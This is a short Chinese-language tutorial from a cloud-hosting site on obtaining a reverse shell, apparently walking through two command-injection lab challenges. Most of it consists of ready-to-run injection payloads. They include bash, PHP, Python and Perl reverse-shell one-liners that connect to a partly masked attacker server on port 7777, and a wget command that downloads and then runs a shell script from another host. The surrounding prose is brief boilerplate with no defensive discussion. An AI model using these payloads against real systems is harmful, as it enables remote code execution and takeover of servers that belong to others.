您好,登錄后才能下訂單哦!
這篇文章主要講解了“怎么反彈shell”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“怎么反彈shell”吧!
whoami是www-data權限,很低的權限;
pwd可查看到當前路徑且判定是linux系統;
ls -al查看了下當前目錄下的讀寫執行權限:
可以看出其他用戶是沒有高權限的,寫入執行權限都沒有,就不能在當前目錄下寫馬;經嘗試,bash反彈shell未能成功。
第一題:exec "ping"
/tmp下有可寫可執行權限,那么寫個bash反彈腳本上去:
127.0.0.1|Echo ‘bash -i >& /dev/tcp/47.107.x.xx/7777 0>&1’>/tmp/cdk.sh
Vps上先監聽,然后bash執行腳本:
127.0.0.1|bash /tmp/cdk.sh
Payload:
127.0.0.1|php -r '$sock=fsockopen("47.107.xx.xxx",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
Payload:
127.0.0.1|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.107.xx.xx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Payload1(依賴/bin/sh):
127.0.0.1|perl -e 'use Socket;$i="47.107.xx.xx";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Payload2(不依賴/bin/sh):
127.0.0.1|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"47.107.xx.xx:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
第二題:exec "eval"
自己服務器上寫個反彈shell的sh,利用wget下載到目標服務器,避免傳輸過程發生格式問題。
利用python啟用http服務。
執行命令:
system('wget -P /tmp/ http://180.76.xx.xx:8000/drinkwater.sh')
執行腳本,成功反彈shell:
system("bash /tmp/drinkwater.sh");
感謝各位的閱讀,以上就是“怎么反彈shell”的內容了,經過本文的學習后,相信大家對怎么反彈shell這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。